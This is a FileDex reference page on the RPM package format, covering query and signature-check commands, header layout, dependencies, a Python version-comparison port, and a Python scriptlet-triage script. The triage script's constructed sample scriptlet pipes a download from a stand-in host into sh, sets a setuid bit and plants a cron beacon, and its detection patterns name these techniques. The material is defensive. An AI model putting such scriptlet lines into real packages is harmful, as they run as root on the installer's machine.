RPM Package
An RPM file is a Linux package format used by Red Hat, Fedora, SUSE, and derivative distributions. FileDex provides reference information only.
Linux package format. Cross-distribution conversion requires repackaging.
Common questions
How do I view the contents of an RPM file without installing it?
Run `rpm -qlp package.rpm` to list every file the package would install; `rpm -qlvp package.rpm` adds mode, owner and size, which is where a setuid bit or a file dropped under /etc/cron.d shows up. `rpm -qip package.rpm` prints the summary metadata (name, version, vendor, build host, description); dependency tags are separate queries, `rpm -qRp package.rpm` for Requires and `rpm -qp --provides package.rpm` for Provides. To extract the files without installing, run `rpm2cpio package.rpm | cpio -idmv` in an empty directory; that step runs none of the package's scriptlets.
What is the difference between RPM and DNF/YUM?
RPM is the low-level tool that installs, queries, and verifies individual packages against the local RPM database. DNF (and its predecessor YUM) is a higher-level package manager that resolves dependencies across repositories, downloads the required packages, checks their signatures when the repository has gpgcheck=1, and hands the whole transaction to librpm for installation. Think of RPM as the engine and DNF as the driver.
Can I install an RPM on Ubuntu or Debian?
Not directly — Debian-based systems use the .deb format and dpkg/apt toolchain. The alien utility can convert RPM packages to .deb format, but the conversion is lossy and scriptlets may not translate correctly. Building from source or finding a native .deb package is generally more reliable.
How do I verify that an RPM has not been tampered with?
Run `rpm --checksig package.rpm` (short form `rpm -K`) to verify the header and payload digests and any embedded OpenPGP signature; add `-v` to see each digest and signature on its own line. Signature verification requires the signer's public key in the RPM keyring, imported with `rpm --import`. If the key is missing, rpm reports NOKEY (older versions print "MISSING KEYS"); an unsigned package reports only digests, which prove the file is intact but say nothing about who built it, so treat both cases with caution. Current rpm signs the header, and the header in turn carries the payload digest, so a good header signature plus a matching payload digest covers the whole file. On dnf/yum systems, `gpgcheck=1` in the repository configuration enforces the same check at install time.
What makes .RPM special
Package management on Red Hat-derived Linux distributions centers on the RPM format, a binary container that bundles compiled software with metadata, dependency declarations, and install-time scripts into a single distributable file.
Technical deep dive
Header Architecture
The RPM header magic 8E AD E8 01 (three magic bytes plus a version byte of 01) appears twice in every package, once for the signature header and once for the main header, preceded by a legacy lead section with its own magic ED AB EE DB. The lead occupies the first 96 bytes and exists solely for backward compatibility with tools predating RPM v3. Following the lead, the signature header stores the digests, sizes and OpenPGP signatures used to verify package integrity before anything is extracted. The main header contains all package metadata: name, version, release, architecture, changelog, file lists, scriptlets and dependency tags. Each header uses an index-store layout: after the magic come 4 reserved bytes, a 32-bit entry count and a 32-bit store size, then a fixed-size index (16 bytes per entry: tag ID, data type, offset into the store, count) followed by the variable-length data store. Offsets and counts come from the file, so a parser has to bound-check them against the store size before dereferencing them.
Dependency Resolution
RPM tracks four hard dependency relationship types through header tags: Requires (what must be present), Provides (what capabilities a package offers), Conflicts (mutual exclusions), and Obsoletes (upgrade replacements). Each tag supports version comparison operators (<, <=, =, >=, >) against an Epoch:Version-Release value and can reference virtual capabilities, file paths such as /bin/sh, or library sonames rather than package names. RPM 4.12 added the weak relationships Recommends, Suggests, Supplements, and Enhances, which dnf acts on but rpm never treats as blocking. The rpm tool itself only checks these relationships against the installed database and refuses a transaction that would break them (unless --nodeps is passed); actual resolution and download falls to higher-level tools like dnf or yum, which build a dependency graph across all configured repositories and compute a transaction set. Rich dependencies, added in RPM 4.13, allow boolean expressions (and, or, if/else, unless, with, without) within a single Requires tag, for example Requires: (pkgA or pkgB).
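How rpm orders version strings, as an added example for this page rather than code from rpm or FileDex: a Python port of the segment-comparison algorithm in rpm's rpmvercmp(), applied to Epoch:Version-Release strings, and a `satisfies()` check of whether a Provides meets a versioned Requires. The function names, the OPS table and the sample versions are this example's own; rich (boolean) dependencies are not parsed here.

```python
"""RPM version ordering and versioned dependency checks (added example, not rpm's code)."""


def rpmvercmp(a, b):
    """Return -1, 0 or 1 the way rpm's rpmvercmp() does.

    Versions are compared segment by segment (all-digit or all-letter runs,
    separators ignored). '~' sorts before anything, even the end of the string
    (1.0~rc1 < 1.0); '^' sorts after the bare version but before a longer one
    (1.0 < 1.0^git1 < 1.0.1).
    """
    if a == b:
        return 0
    i = j = 0
    while i < len(a) or j < len(b):
        while i < len(a) and not (a[i].isalnum() or a[i] in "~^"):
            i += 1
        while j < len(b) and not (b[j].isalnum() or b[j] in "~^"):
            j += 1
        ca = a[i] if i < len(a) else ""
        cb = b[j] if j < len(b) else ""
        if ca == "~" or cb == "~":          # tilde: the side without it is newer
            if ca != "~":
                return 1
            if cb != "~":
                return -1
            i, j = i + 1, j + 1
            continue
        if ca == "^" or cb == "^":          # caret: a finished string is the older base
            if not ca:
                return -1
            if not cb:
                return 1
            if ca != "^":
                return 1
            if cb != "^":
                return -1
            i, j = i + 1, j + 1
            continue
        if not (ca and cb):
            break
        isnum = ca.isdigit()
        same_kind = str.isdigit if isnum else str.isalpha
        si, sj = i, j
        while si < len(a) and same_kind(a[si]):
            si += 1
        while sj < len(b) and same_kind(b[sj]):
            sj += 1
        seg_a, seg_b = a[i:si], b[j:sj]
        if not seg_b:                       # mixed kinds: a numeric segment is newer
            return 1 if isnum else -1
        if isnum:
            seg_a, seg_b = seg_a.lstrip("0"), seg_b.lstrip("0")
            if len(seg_a) != len(seg_b):    # more digits wins; no int conversion needed
                return 1 if len(seg_a) > len(seg_b) else -1
        if seg_a != seg_b:
            return 1 if seg_a > seg_b else -1
        i, j = si, sj
    if i >= len(a) and j >= len(b):
        return 0
    return -1 if i >= len(a) else 1


def parse_evr(evr):
    """Split 'epoch:version-release'; epoch defaults to 0, release may be absent
    (a Requires such as 'glibc >= 2.34' states no release)."""
    epoch = 0
    if ":" in evr:
        e, evr = evr.split(":", 1)
        epoch = int(e)
    version, _, release = evr.partition("-")
    return epoch, version, release or None


def evrcmp(x, y):
    """Compare two EVR strings. Release is only compared when both sides have one,
    which is how rpm treats a Requires that states just a version."""
    e1, v1, r1 = parse_evr(x)
    e2, v2, r2 = parse_evr(y)
    if e1 != e2:
        return 1 if e1 > e2 else -1
    rc = rpmvercmp(v1, v2)
    if rc or r1 is None or r2 is None:
        return rc
    return rpmvercmp(r1, r2)


OPS = {"<": (-1,), "<=": (-1, 0), "=": (0,), ">=": (0, 1), ">": (1,)}


def satisfies(provided_evr, op, required_evr):
    """Does 'Provides: name = provided_evr' satisfy 'Requires: name op required_evr'?"""
    return evrcmp(provided_evr, required_evr) in OPS[op]


if __name__ == "__main__":
    for pair in (("1.10", "1.9"), ("1.0~rc1", "1.0"), ("1.0^git1", "1.0.1"), ("2.0a", "2.01")):
        print("rpmvercmp(%r, %r) = %d" % (pair + (rpmvercmp(*pair),)))
    print("2.34-60.el9 satisfies >= 2.34:", satisfies("2.34-60.el9", ">=", "2.34"))
    print("1.0~rc1-1 satisfies >= 1.0:", satisfies("1.0~rc1-1", ">=", "1.0"))
```

The tilde and caret cases are the ones that bite detection rules and inventory tools written with plain string or semver comparison: a 1.0~rc1 build is older than 1.0, and a 1.0^git snapshot is newer than 1.0 but older than 1.0.1.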
Payload and Compression
Beneath the headers sits a CPIO archive containing the actual files, compressed with gzip, xz, or zstd depending on the build configuration (bzip2 and lzma are also possible; the main header records the choice in RPMTAG_PAYLOADCOMPRESSOR, visible with `rpm -qp --qf '%{PAYLOADCOMPRESSOR}\n' package.rpm`). The rpm2cpio utility strips the lead and both headers and outputs the decompressed CPIO stream, which cpio or bsdtar can then extract. This two-step extraction works even on non-RPM systems, making the format inspectable anywhere, and it runs none of the package's scriptlets. Zstd compression, the default since Fedora 31, decompresses faster than xz at comparable ratios, reducing install transaction times on large packages.
Scriptlets
RPM supports six basic scriptlet hooks: pretrans, pre, post, posttrans, preun, and postun, plus trigger scriptlets that fire on the installation or removal of other packages (or, with file triggers, of matching paths). These shell or Lua scripts run at specific points during install and removal transactions. The pre, post, preun and postun scriptlets receive as $1 the number of instances of the package that will be installed once the transaction completes, which is how %preun tells a removal ($1 is 0) from an upgrade. Scriptlets execute as root, and a failing scriptlet can leave the system in an inconsistent state if the transaction is only partially applied. Lua scriptlets run inside the rpm process itself without forking a shell, making them faster and available even when /bin/sh is not yet installed (useful for base system packages). The rpm -qp --scripts command reveals the embedded scriptlets before installation; --triggers and --filetriggers show the trigger ones.
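Triage of `rpm -qp --scripts` output before installation, as an added example (not FileDex's or rpm's code). The text it parses is constructed here to look like that command's output for a hypothetical package and is not from any real package; the pattern list, function names and reason strings are this example's own choices and produce review hints, not verdicts.

```python
"""Pre-install triage of RPM scriptlets from `rpm -qp --scripts` text (added example)."""
import re

# "postinstall scriptlet (using /bin/sh):"  or  "pretrans scriptlet (using <lua>):"
SCRIPT_RE = re.compile(r"^(\w+) scriptlet \(using (.+?)\):\s*$")
# "postinstall program: /sbin/ldconfig"  (scriptlet declared with -p, so it has no body)
PROGRAM_RE = re.compile(r"^(\w+) program: (.+?)\s*$")

# Constructs that deserve a human look before they run as root. Hints, not verdicts.
SUSPICIOUS = {
    "remote code fetched and executed": re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:ba)?sh\b"),
    "setuid/setgid bit granted": re.compile(r"\bchmod\s+(?:[ug]\+s|[0-7]*[2467][0-7]{3})\b"),
    "base64-decoded payload": re.compile(r"\bbase64\s+(?:-d|--decode)\b"),
    "persistence via cron": re.compile(r"/etc/cron|\bcrontab\b"),
    "ssh key planted": re.compile(r"authorized_keys"),
    "sudoers touched": re.compile(r"/etc/sudoers"),
}

# Constructed sample in the shape of `rpm -qp --scripts` output; not a real package.
SAMPLE = """\
preinstall scriptlet (using /bin/sh):
getent group svc >/dev/null || groupadd -r svc
getent passwd svc >/dev/null || useradd -r -g svc -s /sbin/nologin svc
postinstall scriptlet (using /bin/sh):
/sbin/ldconfig
curl -fsSL http://updates.example.invalid/post.sh | sh
chmod 4755 /usr/bin/svc-helper
echo '*/5 * * * * root /usr/bin/svc-helper --beacon' > /etc/cron.d/svc
preuninstall scriptlet (using /bin/sh):
if [ $1 -eq 0 ]; then systemctl stop svc.service >/dev/null 2>&1 || :; fi
pretrans scriptlet (using <lua>):
posix.mkdir("/var/lib/svc")
"""


def split_scriptlets(text):
    """Return {name: (interpreter_or_program, body)} from the query output."""
    scripts, current = {}, None
    for line in text.splitlines():
        m = SCRIPT_RE.match(line)
        if m:
            current = m.group(1)
            scripts[current] = [m.group(2), []]
            continue
        m = PROGRAM_RE.match(line)
        if m:
            current = None                 # -p scriptlets: the program line is the whole body
            scripts[m.group(1)] = [m.group(2), [m.group(2)]]
            continue
        if current is not None:
            scripts[current][1].append(line)
    return {n: (interp, "\n".join(body).strip()) for n, (interp, body) in scripts.items()}


def audit_scriptlets(text):
    """Return (scriptlet, reason, matched text) triples in scriptlet order."""
    findings = []
    for name, (_interp, body) in split_scriptlets(text).items():
        for reason, pattern in SUSPICIOUS.items():
            for m in pattern.finditer(body):
                findings.append((name, reason, m.group(0)))
    return findings


if __name__ == "__main__":
    # Real use: audit_scriptlets(subprocess.run(["rpm", "-qp", "--scripts", path],
    #                                           capture_output=True, text=True).stdout)
    for name, reason, snippet in audit_scriptlets(SAMPLE):
        print("%-14s %-34s %s" % (name, reason, snippet))
```

Lua scriptlets pass through the same patterns but rarely match them; reading a Lua %pretrans by hand is still worthwhile, since it runs before any file of the transaction is unpacked.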
Technical reference
- MIME Type
- application/x-rpm
- Magic Bytes
- ED AB EE DB (RPM lead magic; each of the two headers starts with 8E AD E8 01)
- Developer
- Red Hat
- Year Introduced
- 1997
- Open Standard
- Yes
Binary Structure
Sequential binary layout: 96-byte lead (magic ED AB EE DB), signature header (magic 8E AD E8 01) padded to an 8-byte boundary, main header (same magic), then a compressed CPIO archive payload. Each header section starts with the magic, 4 reserved bytes, a 32-bit entry count and a 32-bit store size, followed by an index of 16-byte typed tag entries (tag, type, offset, count) pointing into a data store region. All integers are big-endian. Tags use 32-bit identifiers with type codes 0 through 9: NULL, CHAR, INT8, INT16, INT32, INT64, STRING, BIN, STRING_ARRAY, and I18NSTRING, with INT16/INT32/INT64 data aligned to its size within the store.
Attack Vectors
- Arbitrary code execution through scriptlets (pretrans, pre, post, posttrans, preun, postun and triggers) that run as root during installation and removal; `rpm -qp --scripts` shows them before anything is installed
- Privilege escalation via setuid or setgid binaries shipped in the CPIO payload: rpm applies the modes recorded in the header's file list at install time, so a 4755 entry becomes a root-owned setuid binary on the target system (plain extraction with rpm2cpio as an unprivileged user does not grant it); `rpm -qlvp` lists modes and owners beforehand
- Supply chain compromise by signing packages with stolen or leaked signing keys, or by serving modified packages from a compromised mirror to clients that skip verification (gpgcheck=0, or rpm --nosignature)
Mitigation: FileDex does not execute, install, mount, or parse these files. Reference page only.